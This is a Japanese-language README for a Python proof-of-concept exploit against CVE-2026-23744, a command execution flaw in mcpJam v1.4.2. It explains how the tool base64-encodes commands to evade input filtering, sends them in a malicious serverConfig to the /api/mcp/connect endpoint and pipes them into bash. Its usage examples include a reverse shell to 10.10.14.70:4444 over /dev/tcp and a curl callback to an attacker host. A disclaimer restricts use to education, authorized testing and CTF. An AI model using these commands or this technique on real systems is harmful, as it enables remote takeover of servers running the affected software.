
cve-2026-23744 Python エクスプロイト
本ツールは、mcpJam v1.4.2 に影響する任意のコマンド実行の脆弱性 CVE-2026-23744 に対する概念実証エクスプロイト(Python 3 製)です。このユーティリティは、送信前にコマンドを透過的に Base64 エンコードすることでペイロードの配信を自動化し、制限的な入力検証や文字フィルタリング機構を回避するのに役立ちます。ペイロードはターゲットシステム上で /bin/bash ラッパーを通じてデコードされ実行されます。
コマンドは送信前に自動的にエンコードされるため、厳格な入力検証や文字制限を課すアプリケーションを対象とする際の信頼性が向上します。
以下を含む任意のコマンド実行をサポートします:
sh、bash、nc など)以下を表示します:
これにより、トラブルシューティングとエクスプロイトの検証が簡素化されます。
証明書検証の警告を抑制し、自己署名や信頼されていない SSL 証明書を使用するターゲットとのやり取りを可能にします。
必要な依存関係をインストールします:
pip install requests
python3 exploit.py <target_url> "<command>"
python3 exploit.py http://devhub.com:6274 "curl http://10.10.14.70:8888"
python3 exploit.py http://devhub.com:6274 "sh -i >& /dev/tcp/10.10.14.70/4444 0>&1"
このエクスプロイトは、悪意のある serverConfig オブジェクトを作成して /api/mcp/connect エンドポイントをターゲットにします。コマンドを直接送信する代わりに、ペイロードは Base64 エンコードされた文字列に変換され、Bash を介して実行されます:
"args": [
"-c",
f"echo {base64_payload} | base64 -d | bash"
]
このアプローチは、アプリケーションレベルのフィルタリングを回避しつつ、ペイロードがターゲットホスト上で完全にデコードおよび実行されることを保証します。
serverConfig リクエストに埋め込まれます。base64 -d を使用してペイロードをデコードします。/bin/bash に直接パイプされます。[!WARNING] このプロジェクトは、教育目的、許可されたセキュリティ評価、および Capture The Flag (CTF) 環境のためにのみ提供されています。
明示的な許可なくシステムに対して不正に使用することは、違法かつ非倫理的です。著者は、本ソフトウェアの使用に起因する誤用、損害、または法的結果について一切の責任を負いません。